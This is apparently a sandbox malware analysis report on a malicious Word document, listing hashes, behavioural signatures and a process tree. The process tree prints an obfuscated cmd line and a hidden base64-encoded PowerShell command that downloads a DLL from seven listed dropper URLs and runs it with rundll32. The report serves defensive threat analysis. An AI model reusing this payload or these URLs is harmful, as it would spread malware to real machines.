Analysis

  • max time kernel
    45s
  • max time network
    108s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 13:40

General

  • Target

    dati 1301 012021.doc

  • Size

    160KB

  • MD5

    50667a6f18771fa2457d7aac148e5c39

  • SHA1

    b1b865dfdcd99bfd1c9a13420e3da0c43dadcd71

  • SHA256

    2cfe2dfff6ceecc5b57f1f3585b9aa4ba0bb2724bdc3a142519494e36f2f7cf7

  • SHA512

    f339b88c21c4c809cbb85f677b1a7a1a3fafce4e30d8061b3bdeaae21c9985b51afe96c7ae034110bca9b4d42a7771422d2fb7b17aaf2cd5806655df9228c638

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://fynart.com/wp-admin/aNuMy/

exe.dropper

http://dermedicoclinic.com/js/NElI8ZC/

exe.dropper

http://geolifesciences.com/font/r/

exe.dropper

http://rollinghood.com/how-to-ifwed/buj6VQx/

exe.dropper

http://jardindhelena.com/wp-content/u20/

exe.dropper

http://kingshowworldshoppingmall.com/cgi-bin/Ga/

exe.dropper

http://davinciworldshoppingmall.com/cgi-bin/Eh/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dati 1301 012021.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2012
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAkAEYATQBYACAAIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE8ALgAnACwAJwBTAFkAcwB0ACcALAAnAC4AaQAnACwAJwBFAG0AJwAsACcAZABJAHIAZQBjAFQATwByAHkAJwApACAAOwAgACQAaQBzAG8AZgBlAFcAPQAgACAAWwBUAFkAcABlAF0AKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsANgB9AHsAOAB9AHsAMgB9AHsANwB9ACIAIAAtAEYAJwBlAE0ALgAnACwAJwBTAFQAJwAsACcASQBuAFQATQBBACcALAAnAE4ARQB0AC4AJwAsACcAUwB5ACcALAAnAFMARQAnACwAJwBSAFYASQAnACwAJwBuAGEAZwBlAHIAJwAsACcAQwBlAHAATwAnACkAIAA7ACAAIAAkAEUANgBjAGIAMgA2AGUAPQAkAFAANQA4AEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAMgA1AE0AOwAkAEcAMQAxAFUAPQAoACcARwA3ACcAKwAnADEAVAAnACkAOwAgACgAIABnAGUAVAAtAHYAQQByAGkAQQBiAGwAZQAgAGYAbQBYACAAIAAtAFYAYQBsAHUAZQBvACAAIAApADoAOgAiAGMAUgBgAEUAQQBUAEUAZABJAGAAUgBFAGAAYwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHkAVQAnACsAJwBYAEUANgBuAHgAMwAnACsAJwA4ADUAJwApACsAKAAnAHkAJwArACcAVQBYACcAKQArACgAJwBBAGgAagAnACsAJwAyAHYAJwApACsAJwB4ACcAKwAnAG4AeQAnACsAJwBVACcAKwAnAFgAJwApAC4AIgByAEUAYABQAGwAYQBjAGUAIgAoACgAWwBjAGgAQQBSAF0AMQAyADEAKwBbAGMAaABBAFIAXQA4ADUAKwBbAGMAaABBAFIAXQA4ADgAKQAsACcAXAAnACkAKQApADsAJABEAF8AMwBNAD0AKAAoACcAQwAnACsAJwBfADcAJwApACsAJwBHACcAKQA7ACAAIAAoACAAIABWAGEAcgBJAGEAQgBsAGUAIAAoACcASQBTAG8AZgAnACsAJwBFAHcAJwApACkALgBWAGEAbABVAEUAOgA6ACIAUwBgAGUAYwB1AFIASQBUAFkAUABSAG8AdABgAE8AQwBgAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAVQA2ADYASwA9ACgAKAAnAEgAJwArACcAMwAxACcAKQArACcAVgAnACkAOwAkAEsAMwAyADAAMgBzAF8AIAA9ACAAKAAoACcAVAAnACsAJwBfADIAJwApACsAJwBTACcAKQA7ACQAVAA3ADMARQA9ACgAKAAnAEQANwAnACsAJwAwACcAKQArACcARwAnACkAOwAkAEMAMQBlADgAXwByAHYAPQAkAEgATwBNAEUAKwAoACgAKAAnAEcAJwArACcAagBIACcAKQArACcARQAnACsAKAAnADYAbgB4ADMAOAA1ACcAKwAnAEcAagBIAEEAaABqACcAKwAnADIAdgAnACkAKwAnAHgAJwArACgAJwBuACcAKwAnAEcAagAnACkAKwAnAEgAJwApAC4AIgBSAEUAcABsAGAAQQBgAEMAZQAiACgAKABbAGMAaABhAHIAXQA3ADEAKwBbAGMAaABhAHIAXQAxADAANgArAFsAYwBoAGEAcgBdADcAMgApACwAJwBcACcAKQApACsAJABLADMAMgAwADIAcwBfACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQAUQAzADIAQwA9ACgAJwBUADcAJwArACcAMgBGACcAKQA7ACQARABoAHEAYgA1AGIAeAA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwAnACsAJwBEACcAKwAnADoAJwArACcALwAvAGYAeQBuAGEAJwApACsAKAAnAHIAJwArACcAdAAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AYQAnACkAKwAoACcATgAnACsAJwB1ACcAKwAnAE0AeQAvAEAAJwArACcAQQBdAFsAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAnACsAJwAvAGQAZQAnACkAKwAoACcAcgAnACsAJwBtAGUAZABpAGMAbwBjAGwAaQAnACsAJwBuAGkAJwArACcAYwAuAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGoAcwAvAE4ARQBsACcAKQArACgAJwBJADgAWgAnACsAJwBDAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBnAGUAbwBsAGkAJwApACsAJwBmAGUAJwArACgAJwBzAGMAaQAnACsAJwBlAG4AYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAZgBvACcAKwAnAG4AJwArACgAJwB0AC8AcgAvAEAAQQAnACsAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEADoALwAvACcAKwAnAHIAbwAnACkAKwAnAGwAbAAnACsAKAAnAGkAJwArACcAbgBnAGgAJwArACcAbwAnACsAJwBvAGQALgBjAG8AbQAvACcAKwAnAGgAbwB3ACcAKQArACgAJwAtACcAKwAnAHQAbwAtAGkAZgB3ACcAKQArACcAZQBkACcAKwAoACcALwBiAHUAagA2ACcAKwAnAFYAJwApACsAKAAnAFEAeAAvAEAAJwArACcAQQBdAFsAcQAnACsAJwBbAEQAOgAvACcAKwAnAC8AJwArACcAagBhACcAKQArACcAcgBkACcAKwAoACcAaQBuAGQAaAAnACsAJwBlAGwAJwArACcAZQAnACkAKwAoACcAbgBhAC4AYwAnACsAJwBvAG0ALwAnACsAJwB3AHAALQAnACkAKwAoACcAYwBvACcAKwAnAG4AJwApACsAJwB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwB1ACcAKwAnADIAMAAvACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAoACcARAA6AC8AJwArACcALwAnACkAKwAoACcAawBpACcAKwAnAG4AJwApACsAJwBnACcAKwAnAHMAJwArACgAJwBoAG8AJwArACcAdwB3AG8AJwApACsAJwByAGwAJwArACgAJwBkACcAKwAnAHMAJwArACcAaABvAHAAcABpAG4AZwAnACkAKwAoACcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACcALwBjACcAKwAnAGcAJwArACgAJwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcARwBhAC8AQABBACcAKwAnAF0AWwBxACcAKwAnAFsARAA6ACcAKwAnAC8ALwBkAGEAJwArACcAdgBpAG4AJwApACsAKAAnAGMAaQB3ACcAKwAnAG8AJwArACcAcgBsAGQAcwAnACkAKwAnAGgAbwAnACsAKAAnAHAAcAAnACsAJwBpAG4AJwApACsAKAAnAGcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvACcAKwAnAGMAJwApACsAKAAnAGcAaQAnACsAJwAtAGIAJwApACsAJwBpAG4AJwArACgAJwAvAEUAaAAnACsAJwAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBgAGMARQAiACgAKAAnAEEAXQAnACsAKAAnAFsAcQBbACcAKwAnAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQAnACkAKwAnAHcAZgAnACkALAAoACgAJwB3ACcAKwAnAGUAdgB3ACcAKQArACcAZQAnACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACkAKQBbADIAXQApAC4AIgBzAFAAYABMAGkAVAAiACgAJABSADcAOABKACAAKwAgACQARQA2AGMAYgAyADYAZQAgACsAIAAkAEEANgAzAEcAKQA7ACQARQA5ADYAVgA9ACgAJwBPADkAJwArACcANQBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAHEAcAA5AGUANQAgAGkAbgAgACQARABoAHEAYgA1AGIAeAApAHsAdAByAHkAewAoACYAKAAnAE4AZQAnACsAJwB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAcwB5AHMAVABFAE0ALgBuAEUAdAAuAFcARQBCAEMATABJAGUAbgBUACkALgAiAEQATwB3AGAATgBsAG8AYABBAGQAZgBpAGAAbABFACIAKAAkAFgAcgBxAHAAOQBlADUALAAgACQAQwAxAGUAOABfAHIAdgApADsAJABHADgAMwBYAD0AKAAoACcAQwAnACsAJwAxAF8AJwApACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADEAZQA4AF8AcgB2ACkALgAiAGwAYABlAG4AZwB0AEgAIgAgAC0AZwBlACAANAA0ADkANwAzACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAJwArACcAbABsADMAMgAnACkAIAAkAEMAMQBlADgAXwByAHYALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbAAnACsAJwBvAGcAJwApACsAJwBBACcAKQAuACIAdABgAG8AcwBUAGAAUgBpAG4AZwAiACgAKQA7ACQAVQBfADYAWgA9ACgAJwBYACcAKwAoACcAMAAnACsAJwA1AFoAJwApACkAOwBiAHIAZQBhAGsAOwAkAEoAOAAwAEkAPQAoACgAJwBSADQAJwArACcAXwAnACkAKwAnAFEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABFADAAMgBBAD0AKAAnAEoAJwArACgAJwA5ACcAKwAnADcAUQAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:872
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1092
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAkAEYATQBYACAAIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE8ALgAnACwAJwBTAFkAcwB0ACcALAAnAC4AaQAnACwAJwBFAG0AJwAsACcAZABJAHIAZQBjAFQATwByAHkAJwApACAAOwAgACQAaQBzAG8AZgBlAFcAPQAgACAAWwBUAFkAcABlAF0AKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsANgB9AHsAOAB9AHsAMgB9AHsANwB9ACIAIAAtAEYAJwBlAE0ALgAnACwAJwBTAFQAJwAsACcASQBuAFQATQBBACcALAAnAE4ARQB0AC4AJwAsACcAUwB5ACcALAAnAFMARQAnACwAJwBSAFYASQAnACwAJwBuAGEAZwBlAHIAJwAsACcAQwBlAHAATwAnACkAIAA7ACAAIAAkAEUANgBjAGIAMgA2AGUAPQAkAFAANQA4AEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAMgA1AE0AOwAkAEcAMQAxAFUAPQAoACcARwA3ACcAKwAnADEAVAAnACkAOwAgACgAIABnAGUAVAAtAHYAQQByAGkAQQBiAGwAZQAgAGYAbQBYACAAIAAtAFYAYQBsAHUAZQBvACAAIAApADoAOgAiAGMAUgBgAEUAQQBUAEUAZABJAGAAUgBFAGAAYwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHkAVQAnACsAJwBYAEUANgBuAHgAMwAnACsAJwA4ADUAJwApACsAKAAnAHkAJwArACcAVQBYACcAKQArACgAJwBBAGgAagAnACsAJwAyAHYAJwApACsAJwB4ACcAKwAnAG4AeQAnACsAJwBVACcAKwAnAFgAJwApAC4AIgByAEUAYABQAGwAYQBjAGUAIgAoACgAWwBjAGgAQQBSAF0AMQAyADEAKwBbAGMAaABBAFIAXQA4ADUAKwBbAGMAaABBAFIAXQA4ADgAKQAsACcAXAAnACkAKQApADsAJABEAF8AMwBNAD0AKAAoACcAQwAnACsAJwBfADcAJwApACsAJwBHACcAKQA7ACAAIAAoACAAIABWAGEAcgBJAGEAQgBsAGUAIAAoACcASQBTAG8AZgAnACsAJwBFAHcAJwApACkALgBWAGEAbABVAEUAOgA6ACIAUwBgAGUAYwB1AFIASQBUAFkAUABSAG8AdABgAE8AQwBgAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAVQA2ADYASwA9ACgAKAAnAEgAJwArACcAMwAxACcAKQArACcAVgAnACkAOwAkAEsAMwAyADAAMgBzAF8AIAA9ACAAKAAoACcAVAAnACsAJwBfADIAJwApACsAJwBTACcAKQA7ACQAVAA3ADMARQA9ACgAKAAnAEQANwAnACsAJwAwACcAKQArACcARwAnACkAOwAkAEMAMQBlADgAXwByAHYAPQAkAEgATwBNAEUAKwAoACgAKAAnAEcAJwArACcAagBIACcAKQArACcARQAnACsAKAAnADYAbgB4ADMAOAA1ACcAKwAnAEcAagBIAEEAaABqACcAKwAnADIAdgAnACkAKwAnAHgAJwArACgAJwBuACcAKwAnAEcAagAnACkAKwAnAEgAJwApAC4AIgBSAEUAcABsAGAAQQBgAEMAZQAiACgAKABbAGMAaABhAHIAXQA3ADEAKwBbAGMAaABhAHIAXQAxADAANgArAFsAYwBoAGEAcgBdADcAMgApACwAJwBcACcAKQApACsAJABLADMAMgAwADIAcwBfACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQAUQAzADIAQwA9ACgAJwBUADcAJwArACcAMgBGACcAKQA7ACQARABoAHEAYgA1AGIAeAA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwAnACsAJwBEACcAKwAnADoAJwArACcALwAvAGYAeQBuAGEAJwApACsAKAAnAHIAJwArACcAdAAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AYQAnACkAKwAoACcATgAnACsAJwB1ACcAKwAnAE0AeQAvAEAAJwArACcAQQBdAFsAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAnACsAJwAvAGQAZQAnACkAKwAoACcAcgAnACsAJwBtAGUAZABpAGMAbwBjAGwAaQAnACsAJwBuAGkAJwArACcAYwAuAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGoAcwAvAE4ARQBsACcAKQArACgAJwBJADgAWgAnACsAJwBDAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBnAGUAbwBsAGkAJwApACsAJwBmAGUAJwArACgAJwBzAGMAaQAnACsAJwBlAG4AYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAZgBvACcAKwAnAG4AJwArACgAJwB0AC8AcgAvAEAAQQAnACsAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEADoALwAvACcAKwAnAHIAbwAnACkAKwAnAGwAbAAnACsAKAAnAGkAJwArACcAbgBnAGgAJwArACcAbwAnACsAJwBvAGQALgBjAG8AbQAvACcAKwAnAGgAbwB3ACcAKQArACgAJwAtACcAKwAnAHQAbwAtAGkAZgB3ACcAKQArACcAZQBkACcAKwAoACcALwBiAHUAagA2ACcAKwAnAFYAJwApACsAKAAnAFEAeAAvAEAAJwArACcAQQBdAFsAcQAnACsAJwBbAEQAOgAvACcAKwAnAC8AJwArACcAagBhACcAKQArACcAcgBkACcAKwAoACcAaQBuAGQAaAAnACsAJwBlAGwAJwArACcAZQAnACkAKwAoACcAbgBhAC4AYwAnACsAJwBvAG0ALwAnACsAJwB3AHAALQAnACkAKwAoACcAYwBvACcAKwAnAG4AJwApACsAJwB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwB1ACcAKwAnADIAMAAvACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAoACcARAA6AC8AJwArACcALwAnACkAKwAoACcAawBpACcAKwAnAG4AJwApACsAJwBnACcAKwAnAHMAJwArACgAJwBoAG8AJwArACcAdwB3AG8AJwApACsAJwByAGwAJwArACgAJwBkACcAKwAnAHMAJwArACcAaABvAHAAcABpAG4AZwAnACkAKwAoACcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACcALwBjACcAKwAnAGcAJwArACgAJwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcARwBhAC8AQABBACcAKwAnAF0AWwBxACcAKwAnAFsARAA6ACcAKwAnAC8ALwBkAGEAJwArACcAdgBpAG4AJwApACsAKAAnAGMAaQB3ACcAKwAnAG8AJwArACcAcgBsAGQAcwAnACkAKwAnAGgAbwAnACsAKAAnAHAAcAAnACsAJwBpAG4AJwApACsAKAAnAGcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvACcAKwAnAGMAJwApACsAKAAnAGcAaQAnACsAJwAtAGIAJwApACsAJwBpAG4AJwArACgAJwAvAEUAaAAnACsAJwAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBgAGMARQAiACgAKAAnAEEAXQAnACsAKAAnAFsAcQBbACcAKwAnAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQAnACkAKwAnAHcAZgAnACkALAAoACgAJwB3ACcAKwAnAGUAdgB3ACcAKQArACcAZQAnACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACkAKQBbADIAXQApAC4AIgBzAFAAYABMAGkAVAAiACgAJABSADcAOABKACAAKwAgACQARQA2AGMAYgAyADYAZQAgACsAIAAkAEEANgAzAEcAKQA7ACQARQA5ADYAVgA9ACgAJwBPADkAJwArACcANQBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAHEAcAA5AGUANQAgAGkAbgAgACQARABoAHEAYgA1AGIAeAApAHsAdAByAHkAewAoACYAKAAnAE4AZQAnACsAJwB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAcwB5AHMAVABFAE0ALgBuAEUAdAAuAFcARQBCAEMATABJAGUAbgBUACkALgAiAEQATwB3AGAATgBsAG8AYABBAGQAZgBpAGAAbABFACIAKAAkAFgAcgBxAHAAOQBlADUALAAgACQAQwAxAGUAOABfAHIAdgApADsAJABHADgAMwBYAD0AKAAoACcAQwAnACsAJwAxAF8AJwApACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADEAZQA4AF8AcgB2ACkALgAiAGwAYABlAG4AZwB0AEgAIgAgAC0AZwBlACAANAA0ADkANwAzACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAJwArACcAbABsADMAMgAnACkAIAAkAEMAMQBlADgAXwByAHYALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbAAnACsAJwBvAGcAJwApACsAJwBBACcAKQAuACIAdABgAG8AcwBUAGAAUgBpAG4AZwAiACgAKQA7ACQAVQBfADYAWgA9ACgAJwBYACcAKwAoACcAMAAnACsAJwA1AFoAJwApACkAOwBiAHIAZQBhAGsAOwAkAEoAOAAwAEkAPQAoACgAJwBSADQAJwArACcAXwAnACkAKwAnAFEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABFADAAMgBBAD0AKAAnAEoAJwArACgAJwA5ACcAKwAnADcAUQAnACkAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1808
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1836
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mdsqirhykf\jfgixhizl.mbk",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1328

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll

      MD5

      394a75acfeb1f49d2a7e7d13dfc52cf9

      SHA1

      7cd7ccc4406722e58782237c12228562ad35b4d0

      SHA256

      4f934c31c5281e2d503afffe12bf346e1154b20c81eddc33b9fa28eb17c783cc

      SHA512

      ca21111439407d9902af564e8079c92125d5bd8750525dd7f88f7288082a144a243f374e1c2fd902bb89c4a38facfcda41a1416d3c5fcc85dad682530e7d0059

    • \Users\Admin\E6nx385\Ahj2vxn\T_2S.dll

      MD5

      394a75acfeb1f49d2a7e7d13dfc52cf9

      SHA1

      7cd7ccc4406722e58782237c12228562ad35b4d0

      SHA256

      4f934c31c5281e2d503afffe12bf346e1154b20c81eddc33b9fa28eb17c783cc

      SHA512

      ca21111439407d9902af564e8079c92125d5bd8750525dd7f88f7288082a144a243f374e1c2fd902bb89c4a38facfcda41a1416d3c5fcc85dad682530e7d0059

    • \Users\Admin\E6nx385\Ahj2vxn\T_2S.dll

      MD5

      394a75acfeb1f49d2a7e7d13dfc52cf9

      SHA1

      7cd7ccc4406722e58782237c12228562ad35b4d0

      SHA256

      4f934c31c5281e2d503afffe12bf346e1154b20c81eddc33b9fa28eb17c783cc

      SHA512

      ca21111439407d9902af564e8079c92125d5bd8750525dd7f88f7288082a144a243f374e1c2fd902bb89c4a38facfcda41a1416d3c5fcc85dad682530e7d0059

    • \Users\Admin\E6nx385\Ahj2vxn\T_2S.dll

      MD5

      394a75acfeb1f49d2a7e7d13dfc52cf9

      SHA1

      7cd7ccc4406722e58782237c12228562ad35b4d0

      SHA256

      4f934c31c5281e2d503afffe12bf346e1154b20c81eddc33b9fa28eb17c783cc

      SHA512

      ca21111439407d9902af564e8079c92125d5bd8750525dd7f88f7288082a144a243f374e1c2fd902bb89c4a38facfcda41a1416d3c5fcc85dad682530e7d0059

    • \Users\Admin\E6nx385\Ahj2vxn\T_2S.dll

      MD5

      394a75acfeb1f49d2a7e7d13dfc52cf9

      SHA1

      7cd7ccc4406722e58782237c12228562ad35b4d0

      SHA256

      4f934c31c5281e2d503afffe12bf346e1154b20c81eddc33b9fa28eb17c783cc

      SHA512

      ca21111439407d9902af564e8079c92125d5bd8750525dd7f88f7288082a144a243f374e1c2fd902bb89c4a38facfcda41a1416d3c5fcc85dad682530e7d0059

    • memory/1092-2-0x0000000000000000-mapping.dmp

    • memory/1096-20-0x000007FEF7B20000-0x000007FEF7D9A000-memory.dmp

      Filesize

      2.5MB

    • memory/1328-19-0x0000000000000000-mapping.dmp

    • memory/1608-9-0x000000001C440000-0x000000001C441000-memory.dmp

      Filesize

      4KB

    • memory/1608-11-0x000000001C510000-0x000000001C511000-memory.dmp

      Filesize

      4KB

    • memory/1608-8-0x0000000002360000-0x0000000002361000-memory.dmp

      Filesize

      4KB

    • memory/1608-7-0x0000000002440000-0x0000000002441000-memory.dmp

      Filesize

      4KB

    • memory/1608-6-0x000000001AB10000-0x000000001AB11000-memory.dmp

      Filesize

      4KB

    • memory/1608-5-0x0000000002400000-0x0000000002401000-memory.dmp

      Filesize

      4KB

    • memory/1608-4-0x000007FEF58F0000-0x000007FEF62DC000-memory.dmp

      Filesize

      9.9MB

    • memory/1608-3-0x0000000000000000-mapping.dmp

    • memory/1808-12-0x0000000000000000-mapping.dmp

    • memory/1836-14-0x0000000000000000-mapping.dmp

    • memory/2012-10-0x0000000000650000-0x0000000000651000-memory.dmp

      Filesize

      4KB